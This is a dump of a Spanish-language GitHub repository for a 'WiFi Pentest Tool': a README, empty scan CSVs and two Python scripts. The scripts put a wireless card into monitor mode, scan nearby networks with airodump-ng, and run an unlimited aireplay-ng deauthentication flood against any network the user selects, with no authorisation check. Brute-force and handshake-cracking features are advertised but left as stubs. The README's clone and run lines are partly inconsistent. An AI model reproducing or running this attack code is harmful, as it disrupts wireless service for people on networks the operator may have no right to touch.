├── scan_results-01.csv ├── scan_results-02.csv ├── scan_results-03.csv ├── scan_results-04.csv ├── scan_results-05.csv ├── scan_results-06.csv ├── scan_results-07.csv ├── scan_results.csv-01.csv ├── 1.png ├── a.png ├── README.md ├── nano.6483.save └── wifi_pentest_tool.py /scan_results-01.csv: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /scan_results-02.csv: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /scan_results-03.csv: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /scan_results-04.csv: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /scan_results-05.csv: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /scan_results-06.csv: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /scan_results-07.csv: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /scan_results.csv-01.csv: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ccyl13/WiFiPentestTool/HEAD/1.png -------------------------------------------------------------------------------- /a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ccyl13/WiFiPentestTool/HEAD/a.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WiFiPentestTool 2 | 3 | WiFiPentestTool es una herramienta para realizar pruebas de penetración en redes WiFi. Permite escanear redes WiFi, realizar ataques de fuerza bruta, ataques de desautenticación, capturar handshakes y crackear esos handshakes. 4 | ## Imagen de la Herramienta 5 | 6 | ![WiFiPentestTool](https://github.com/ccyl13/WiFiPentestTool/blob/main/1.png) 7 | 8 | ## Desarrollador 9 | 10 | Desarrollada por Thomas O'Neil Álvarez. 11 | 12 | ## Índice 13 | 14 | - [Características](#características) 15 | - [Requisitos](#requisitos) 16 | - [Instalación](#instalación) 17 | - [Uso](#uso) 18 | - [Escanear redes WiFi](#escanear-redes-wifi) 19 | - [Ataque de fuerza bruta](#ataque-de-fuerza-bruta) 20 | - [Ataque de desautenticación](#ataque-de-desautenticación) 21 | - [Captura de Handshake](#captura-de-handshake) 22 | - [Cracking de Handshake](#cracking-de-handshake) 23 | - [Contribución](#contribución) 24 | - [Licencia](#licencia) 25 | 26 | ## Características 27 | 28 | - **Escaneo de Redes WiFi:** Detecta redes WiFi disponibles en el entorno. 29 | - **Ataque de Fuerza Bruta:** Intenta descifrar contraseñas de redes WiFi mediante ataques de fuerza bruta. 30 | - **Ataque de Desautenticación:** Desautentica dispositivos de una red WiFi específica. 31 | - **Captura de Handshake:** Captura el handshake de una red WiFi para su posterior análisis. 32 | - **Cracking de Handshake:** Utiliza técnicas de cracking para descifrar contraseñas a partir del handshake capturado. 33 | 34 | ## Requisitos 35 | 36 | - **Sistema Operativo:** Linux (diseñado para Kali Linux) 37 | - **Dependencias:** 38 | - aircrack-ng 39 | - aireplay-ng 40 | - airodump-ng 41 | - nano (opcional para edición de archivos de configuración) 42 | 43 | ## Instalación 44 | 45 | Clona el repositorio desde GitHub: 46 | 47 | ```bash 48 | git clone https://github.com/cgyl3/WiFiPentestTool.git 49 | cd WiFiPentestTool 50 | python3 WiFiPentestTool 51 | python3 wifi_pentest_tool.py 52 | 53 | -------------------------------------------------------------------------------- /nano.6483.save: -------------------------------------------------------------------------------- 1 | import os 2 | import subprocess 3 | import re 4 | 5 | def banner(): 6 | os.system('clear') 7 | print(""" 8 | __ ___ _____ _ ____ _ _ _____ _ 9 | \ \ / (_) ___(_) | _ \ ___ _ __ | |_ ___ ___| |_ |_ _|__ ___ | | 10 | \ \ /\ / /| | |_ | | | |_) / _ \ '_ \| __/ _ \/ __| __| | |/ _ \ / _ \| | 11 | \ V V / | | _| | | | __/ __/ | | | || __/\__ \ |_ | | (_) | (_) | | 12 | \_/\_/ |_|_| |_| |_| \___|_| |_|\__\___||___/\__| |_|\___/ \___/|_| 13 | 14 | Desarrollada por Thomas O'Neil Álvarez 15 | ====================================== 16 | """) 17 | 18 | def menu(): 19 | print("[1] Escanear redes WiFi") 20 | print("[2] Realizar ataque de fuerza bruta") 21 | print("[3] Ataque de desautenticación") 22 | print("[4] Capturar Handshake") 23 | print("[5] Cracking de Handshake") 24 | print("[6] Guardar resultados del escaneo") 25 | print("[7] Cargar configuración") 26 | print("[8] Salir") 27 | 28 | def scan_wifi(): 29 | iface = input('Introduce la interfaz de red (por ejemplo, wlan0): ').strip() 30 | 31 | if not os.path.exists(f'/sys/class/net/{iface}'): 32 | print(f'ERROR: La interfaz {iface} no existe.') 33 | return [] 34 | 35 | # Escanear redes WiFi 36 | print('Escaneando redes WiFi con iwlist...') 37 | try: 38 | cmd = ['sudo', 'iwlist', iface, 'scan'] 39 | result = subprocess.run(cmd, capture_output=True, text=True) 40 | if result.returncode != 0: 41 | print('ERROR: No se pudo ejecutar el escaneo.') 42 | return [] 43 | 44 | output = result.stdout 45 | networks = [] 46 | 47 | # Analizar el resultado del escaneo 48 | cells = output.split('Cell') 49 | for cell in cells[1:]: 50 | ssid = re.search(r'ESSID:"(.*?)"', cell) 51 | bssid = re.search(r'Address: (.*?)\n', cell) 52 | if ssid and bssid: 53 | essid = ssid.group(1) 54 | bssid = bssid.group(1) 55 | networks.append((essid, bssid)) 56 | print(f'{len(networks)}: {essid} ({bssid})') 57 | 58 | return networks 59 | 60 | except Exception as e: 61 | print(f'ERROR: {e}') 62 | return [] 63 | 64 | def deauth_attack(): 65 | networks = scan_wifi() 66 | if not networks: 67 | print('No se encontraron redes WiFi para atacar.') 68 | return 69 | 70 | print('Selecciona una red por el número:') 71 | for i, (essid, bssid) in enumerate(networks): 72 | print(f'{i + 1}: {essid} ({bssid})') 73 | 74 | try: 75 | choice = int(input('Número de red: ').strip()) 76 | if 1 <= choice <= len(networks): 77 | essid, bssid = networks[choice - 1] 78 | print(f'Seleccionado: {essid} ({bssid})') 79 | else: 80 | print('Opción no válida.') 81 | return 82 | except ValueError: 83 | print('Entrada no válida. Debe ser un número.') 84 | return 85 | 86 | iface = input('Introduce la interfaz de red (por ejemplo, wlan0): ').strip() 87 | if not os.path.exists(f'/sys/class/net/{iface}'): 88 | print(f'ERROR: La interfaz {iface} no existe.') 89 | return 90 | 91 | print('Iniciando ataque de desautenticación...') 92 | try: 93 | cmd = ['sudo', 'aireplay-ng', '--deauth', '0', '-a', bssid, iface] 94 | result = subprocess.run(cmd, capture_output=True, text=True) 95 | print(result.stdout) 96 | if result.returncode != 0: 97 | print('Error al ejecutar el ataque de desautenticación.') 98 | except Exception as e: 99 | print(f'Error al ejecutar el ataque de desautenticación: {e}') 100 | 101 | def main(): 102 | banner() 103 | while True: 104 | menu() 105 | choice = input('Selecciona una opción: ').strip() 106 | if choice == '1': 107 | scan_wifi() 108 | elif choice == '2': 109 | # Implementar función para ataque de fuerza bruta 110 | pass 111 | elif choice == '3': 112 | deauth_attack() 113 | elif choice == '4': 114 | # Implementar función para capturar handshake 115 | pass 116 | elif choice == '5': 117 | # Implementar función para cracking de handshake 118 | pass 119 | elif choice == '6': 120 | # Implementar función para guardar resultados del escaneo 121 | pass 122 | elif choice == '7': 123 | # Implementar función para cargar configuración 124 | pass 125 | elif choice == '8': 126 | print('Saliendo...') 127 | break 128 | else: 129 | print('Opción no válida') 130 | 131 | if __name__ == '__main__': 132 | main() 133 | 134 | 135 | 1 136 | -------------------------------------------------------------------------------- /wifi_pentest_tool.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import os 3 | import csv 4 | import time 5 | from termcolor import colored 6 | from pyfiglet import figlet_format 7 | 8 | def banner(): 9 | os.system('clear') 10 | print(colored(figlet_format('WiFi Pentest Tool'), 'red')) 11 | print(colored('Desarrollada por Thomas O\'Neil Álvarez', 'green')) 12 | print(colored('======================================', 'yellow')) 13 | 14 | def menu(): 15 | print(colored('[1] Escanear redes WiFi', 'blue')) 16 | print(colored('[2] Realizar ataque de fuerza bruta', 'blue')) 17 | print(colored('[3] Ataque de desautenticación', 'blue')) 18 | print(colored('[4] Capturar Handshake', 'blue')) 19 | print(colored('[5] Cracking de Handshake', 'blue')) 20 | print(colored('[6] Guardar resultados del escaneo', 'blue')) 21 | print(colored('[7] Cargar configuración', 'blue')) 22 | print(colored('[8] Salir', 'blue')) 23 | 24 | def set_interface_monitor_mode(iface): 25 | try: 26 | subprocess.run(['sudo', 'ifconfig', iface, 'down'], check=True) 27 | subprocess.run(['sudo', 'iwconfig', iface, 'mode', 'monitor'], check=True) 28 | subprocess.run(['sudo', 'ifconfig', iface, 'up'], check=True) 29 | print(colored(f'Interfaz {iface} configurada en modo monitor.', 'green')) 30 | except subprocess.CalledProcessError: 31 | print(colored(f'ERROR: No se pudo poner {iface} en modo monitor.', 'red')) 32 | 33 | def is_interface_available(iface): 34 | try: 35 | output = subprocess.check_output(['ip', 'link', 'show', iface], stderr=subprocess.STDOUT) 36 | return iface in output.decode() 37 | except subprocess.CalledProcessError: 38 | return False 39 | 40 | def is_interface_in_monitor_mode(iface): 41 | try: 42 | output = subprocess.check_output(['iwconfig', iface], stderr=subprocess.STDOUT) 43 | return 'Mode:Monitor' in output.decode() 44 | except subprocess.CalledProcessError: 45 | return False 46 | 47 | def scan_wifi(): 48 | iface = input(colored('Introduce la interfaz de red (por ejemplo, wlan0): ', 'yellow')).strip() 49 | 50 | if not is_interface_available(iface): 51 | print(colored(f'ERROR: La interfaz {iface} no existe.', 'red')) 52 | return [], [], [] 53 | 54 | if not is_interface_in_monitor_mode(iface): 55 | set_interface_monitor_mode(iface) 56 | 57 | csv_file = '/tmp/airodump' 58 | networks = [] 59 | bssids = [] 60 | channels = [] 61 | 62 | try: 63 | print(colored('Iniciando escaneo... Presiona Ctrl+C para finalizar el escaneo y proceder con el ataque.', 'green')) 64 | cmd = ['sudo', 'airodump-ng', iface, '--write', csv_file, '--write-interval', '1', '--output-format', 'csv'] 65 | process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) 66 | 67 | try: 68 | while True: 69 | time.sleep(1) 70 | csv_path = f'{csv_file}-01.csv' 71 | if os.path.exists(csv_path): 72 | with open(csv_path, 'r') as f: 73 | reader = csv.reader(f) 74 | networks = [] 75 | bssids = [] 76 | channels = [] 77 | for row in reader: 78 | if len(row) > 13 and row[13].strip() and row[0].strip(): 79 | bssid = row[0].strip() 80 | essid = row[13].strip() 81 | channel = row[3].strip() 82 | if essid not in networks: 83 | networks.append(essid) 84 | bssids.append(bssid) 85 | channels.append(channel) 86 | if networks: 87 | print(colored('Redes WiFi encontradas:', 'green')) 88 | for idx, (network, channel) in enumerate(zip(networks, channels), start=1): 89 | print(colored(f'[{idx}] {network} (Canal: {channel})', 'red')) 90 | output = process.stdout.readline() 91 | if output == '' and process.poll() is not None: 92 | break 93 | if output: 94 | print(output.strip()) # Mostrar salida en tiempo real 95 | except KeyboardInterrupt: 96 | print(colored('Escaneo detenido por el usuario.', 'yellow')) 97 | finally: 98 | process.terminate() 99 | process.wait() 100 | 101 | return networks, bssids, channels 102 | except subprocess.CalledProcessError as e: 103 | print(colored(f'ERROR: No se pudo ejecutar el escaneo. {e}', 'red')) 104 | except Exception as e: 105 | print(colored(f'ERROR: Se produjo un error inesperado. {e}', 'red')) 106 | 107 | return [], [], [] 108 | 109 | def deauth_attack(networks, bssids, channels): 110 | try: 111 | choice = int(input(colored('Selecciona el número de la red objetivo: ', 'yellow')).strip()) 112 | if choice < 1 or choice > len(networks): 113 | raise ValueError('Número de red no válido.') 114 | essid = networks[choice - 1] 115 | bssid = bssids[choice - 1] 116 | channel = channels[choice - 1] 117 | print(colored(f'Seleccionaste: {essid}', 'green')) 118 | except (ValueError, IndexError) as e: 119 | print(colored(f'ERROR: {e}', 'red')) 120 | return 121 | 122 | iface = input(colored('Introduce la interfaz de red (por ejemplo, wlan0mon): ', 'yellow')).strip() 123 | 124 | if not is_interface_available(iface): 125 | print(colored(f'ERROR: La interfaz {iface} no existe.', 'red')) 126 | return 127 | 128 | if not is_interface_in_monitor_mode(iface): 129 | set_interface_monitor_mode(iface) 130 | 131 | try: 132 | # Configurar el canal de la interfaz 133 | subprocess.run(['sudo', 'iwconfig', iface, 'channel', channel], check=True) 134 | print(colored(f'Interfaz {iface} configurada en el canal {channel}.', 'green')) 135 | except subprocess.CalledProcessError as e: 136 | print(colored(f'ERROR: No se pudo configurar el canal. {e}', 'red')) 137 | return 138 | 139 | print(colored('Iniciando ataque de desautenticación...', 'green')) 140 | try: 141 | cmd = ['sudo', 'aireplay-ng', '--deauth', '0', '-a', bssid, iface] 142 | process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) 143 | try: 144 | while True: 145 | output = process.stdout.readline() 146 | if output == '' and process.poll() is not None: 147 | break 148 | if output: 149 | print(output.strip()) 150 | except KeyboardInterrupt: 151 | print(colored('Ataque detenido por el usuario.', 'yellow')) 152 | process.terminate() 153 | finally: 154 | err = process.stderr.read() 155 | if err: 156 | print(colored(f'ERROR: {err}', 'red')) 157 | except Exception as e: 158 | print(colored(f'ERROR: No se pudo ejecutar el ataque de desautenticación. {e}', 'red')) 159 | 160 | def main(): 161 | banner() 162 | networks = [] 163 | bssids = [] 164 | channels = [] 165 | while True: 166 | menu() 167 | choice = input(colored('Selecciona un ataque: ', 'yellow')).strip() 168 | if choice == '1': 169 | networks, bssids, channels = scan_wifi() 170 | elif choice == '2': 171 | # Implementar función para ataque de fuerza bruta 172 | pass 173 | elif choice == '3': 174 | if networks: 175 | deauth_attack(networks, bssids, channels) 176 | else: 177 | print(colored('ERROR: Primero escanea las redes WiFi.', 'red')) 178 | elif choice == '4': 179 | # Implementar función para capturar handshake 180 | pass 181 | elif choice == '5': 182 | # Implementar función para cracking de handshake 183 | pass 184 | elif choice == '6': 185 | # Implementar función para guardar resultados del escaneo 186 | pass 187 | elif choice == '7': 188 | # Implementar función para cargar configuración 189 | pass 190 | elif choice == '8': 191 | print(colored('Saliendo...', 'red')) 192 | break 193 | else: 194 | print(colored('Opción no válida', 'red')) 195 | 196 | if __name__ == '__main__': 197 | main() 198 | --------------------------------------------------------------------------------